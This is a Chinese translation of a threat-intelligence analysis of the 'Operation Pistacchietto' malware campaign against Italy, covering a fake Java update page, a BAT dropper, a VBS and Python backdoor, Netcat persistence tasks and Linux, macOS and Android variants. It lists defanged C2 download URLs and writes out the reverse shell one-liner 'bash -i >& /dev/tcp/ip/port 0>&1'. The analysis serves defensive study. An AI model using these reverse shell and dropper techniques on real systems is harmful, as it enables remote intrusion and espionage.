介绍

过去几周，一起新的网络威胁行动搅乱了意大利政坛，该行动被称为“Pistacchietto行动”，Pistacchietto这个名字来自Github上一个疑似涉及此次行动的账户名。研究人员在对该行动初步研究后表示，攻击者似乎是意大利人，因为从文件名和脚本中发现的一些意大利单词（“pistacchietto”、“bonifico”等）可以证明这一点。

图1.服务器所在地。

经过初步分析，Cybaz-Yoroi ZLAB实验室发现该行动有一些独到之处，TTP（Tactics、Techniques、Procedures战术、技术和过程）中也有一些有趣的地方，因此决定进一步挖掘更多与这个神秘黑客相关的样本信息。

技术分析

样本有一定复杂性，它由多个特定的恶意软件组成，目的是攻击电脑和手机等不同的设备。在接下来的几节中，我们将根据样本的体系结构分析其中的一些恶意软件。

MS Windows样本

攻击始于一个简单的伪Java页面，欺骗用户单击链接以更新Java版本。

图2.伪造的更新页面。

更新提示中，显示的要下载的文件名为“window-update.hta”，点击下载后却是一个.bat文件。

将这个.bat文件上传到VirusTotal后，发现它的检出率非常低:只有4个反恶意软件能够检测到它。

图3.初始BAT dropper的检出率。

win.bat文件的源码乍看之下像是由一个脚本小子编写的，因为它含有大量的注释，不过也可能只是一个初稿。该脚本由两部分组成:第一部分负责查询用户的管理权限，第二部分旨在下载其他组件并使用Windows任务调度程序(schtasks)设置持久性。如图所示，第一部分与从Github公共存储库中检索到的代码片段对比如下：

图4.样本代码与Github上发现的代码比较。

第二部分则会检查机器架构，进而下载相应的组件，包括:

· 要执行的新操作的文本文件，来自config01.homepc[. /svc/wup.php?pc=pdf_%computername%

· Windows的NETCAT实用程序，来自config01.homepc[. /win/nc64.exe和config01.homepc[. /win/nc.exe]

· Windows的WGET实用程序，来自config01.homepc[. /win/ WGET .exe和config01.homepc[. /win/wget32.exe

其他恶意组件则来自下列地址:

· config01.homepc[.it/win/get.vbs

· config01.homepc[.it/win/sys.xml

· config01.homepc[.it/win/syskill.xml

· config01.homepc[.it/win/office_get.xml

· config01.homepc[.it/win/woffice.exe

· config01.homepc[.it/win/init.vbs

· config01.homepc[.it/win/winsw.exe

图5.BAT dropper的部分代码。

在代码片段中，有许多经过注释的URL路径，这说明恶意软件仍处于尚未完善的阶段。而在我们的分析期间，此bat文件和一些其他构件也在不断的被更改，比如添加/删除代码行，更改变量名称等，但是服务器URL和通用行为是不变的。这些改动，即使能证明与攻击者的测试用例相关，也会使反恶意程序始终无法检测到文件，因为它的签名每次都在变化。

其他一些以注释方式嵌入到脚本中的URL是：

· hxxps: / / github [.com/pistacchietto/Win-Python-Backdoor/raw/master

· hxxp:/ / verifiche.ddns[.net/ { some_files }

检查存储库时，我们发现一些组件也托管在了config01.homepc [.it / win / location中，因此攻击者可能只是在开发阶段使用该平台，而config01.homepc.it则是真正“生产”恶意软件的服务器。第二条URL——verifiche.ddns [.net在写入时似乎关闭了，它可能是以前旧版本的恶意软件或未来版本中使用的服务器。

下载所有组件后，批处理脚本会将大部分组件植入％windir％文件夹，并且将其中一个核心组件植入C：\ Program Files \ Windows Defender中，之后该脚本通过schtasks注册一些自动任务，以便定期启动恶意组件。

图6.安排后门执行的说明。

下一节将简要分析这些恶意文件。

样本“office_get.xml”

该样本是一个简单的XML文件，定义新计划任务的配置。使用此配置文件创建的任务，其唯一目的是定期执行位于C：\ WINDOWS \ get.vbs中的VisualBasic脚本。

图7.命令嵌入到XML文件中。

样本“get.vbs”

该脚本使用对象MSXML2.ServerXMLHTTP，从Google Drive（https：//drive.google [.com / uc？export = download＆id = 1nT2hQWW1tOM_yxPK5_nhIm8xBVETGXdF）处下载共享文件。该文件包含的服务器URL列表如下图所示：

图8.C2的IP地址。

上图中的两个地址是IPv6地址，而使用新的IP地址标准是恶意软件领域的一个罕见的特性。查询域名后发现，这些域名是在全球网络服务供应商Hurricane Electric上注册的，该公司还提供免费的IPv6隧道代理服务，可以充当IPv4和IPv6协议之间的链接。目前还没有IPv6地址活动的直接证据，但是我们认为，攻击者可能会在该公司的IPv6隧道里伪装其C2(通常在IPv4上工作)，使检测变得更加困难。

在检入过程中，恶意软件会提取一些PC信息，比如计算机名和MAC地址，然后通过以下路径发送到服务器:

http://" & serverURL & "/svc/wup.php?pc=" & strComputerName & "_" & mac

服务器以编码消息指示恶意软件应该执行的新操作。但是，VBS脚本似乎只检查“exec”字段，如图所示。

图9.C2的响应。

如果将“exec”参数设置为“1”，那么脚本将提取“cmd”参数的值，其中包含了要执行的新命令，命令将在Shell上运行。目前所有其他字段都没有被恶意软件所涉及，这表明它可能还在开发中。

图10.如果设置了EXEC参数，则执行指定的命令。

执行接收到的命令后，脚本会使用之前下载的Netcat工具打开与恶意服务器的连接，为攻击者提供访问受害者shell的权限。

图11.建立与C2远程连接的命令。

样本“woffice.exe”, “woffice2.exe”和“NisSrv.exe”

“woffice2.exe”和“NisSrv.exe”文件等同于“woffice.exe”，它们只是“woffice.py”的编译版本，“woffice.py”是托管在“Pistacchietto”存储库中的Python源文件，该文件的功能与之前分析的VBS bot相同，但它使用不同的C2 URL，例如：

图12.嵌入到“woffice.py”文件中的其他C2的IP。

因此，攻击者创建了相同恶意后门的不同副本，并将它们设置为同时运行，这可能是回弹技术。

样本“sys.xml”和“syskill.xml”

这两个文件是XML任务调度程序配置，其中嵌入了以下命令:：

图13.嵌入到XML文件中的命令。

第一条命令每隔1分钟就使用Netcat(“nc64.exe”)启动一个TCP连接，如前所示，连接到一个新的服务器“config02.addns[.org”；而第二条命令则每隔5分钟杀死所有名为“nc64”的活动进程。

Linux、OSX和Android示例

攻击者似乎为此项行动准备了好几类系统的攻击样本:除了Windows之外，还有一些与Linux、Mac和Android设备相关的示例。

在Windows、Linux和Mac版本中，恶意软件的行为是相同的:它会植入之前展示过的Python后门的自动执行。

在下面的图中显示了最初的bash文件，该文件用于通过“crontab”和“systemctl”Linux命令设置“woffice.py”后门的调度。

图14.Linux版本的初始BASH dropper。

显然，在Win版本的后门中执行的所有Windows命令都必须被Unix版本替换。因此，命令“bash -i >& /dev/tcp/ip/port 0>&1”代替了用于在Windows中建立Netcat反向shell的指令。

图15.用于与C2建立连接的Linux命令。

Mac的后门非常类似于Linux，“woffice.py”是核心payload。

图16. OSX后门的设置文件。

对存储库的分析表明，它是此篇文章提供的OSX后门的副本。攻击者编辑了其中的一些模块，并将其嵌入到自己的版本的后门中。

此外，arsenal也算一种Android RAT，它是流行的恶意软件“AhMyth Android Rat”的副本，由攻击者编辑后加入了其命令和控制服务器的IP地址。

图17.攻击者修改的部分AhMyth RAT代码。

结论

“Pistacchietto行动”比我们最初预想的要更为复杂。通过之前的种种，我们也能推测此项行动幕后的威胁行为者并非十分专业，但不应忽视的是，这是一个经过长时间预谋的间谍行动，从攻击者开发出了四个主要操作系统的版本——Microsoft Windows主机，Mac OSX系统，Linux服务器和Android移动设备——就能看出这一点。

我们仍然没有猜测到此项行动的目的，很可能是出于个人动机而不是经济层面或国家层面。此项行动也提供了一个重要的安全警示——执行犯罪间谍活动的攻击能力正越来越容易被个人网络行动者所掌握。

意大利也不是第一次出现这种“自制”的间谍行动了:早在2017年，Occhionero间谍活动就曾重创了意大利的公共行政部门、企业，以及意大利的前总理。

本文翻译自：https://securityaffairs.co/wordpress/82066/cyber-crime/op-pistacchietto-hacking-campaign.html

翻译作者：Change 原文地址：https://www.4hou.com/web/16698.html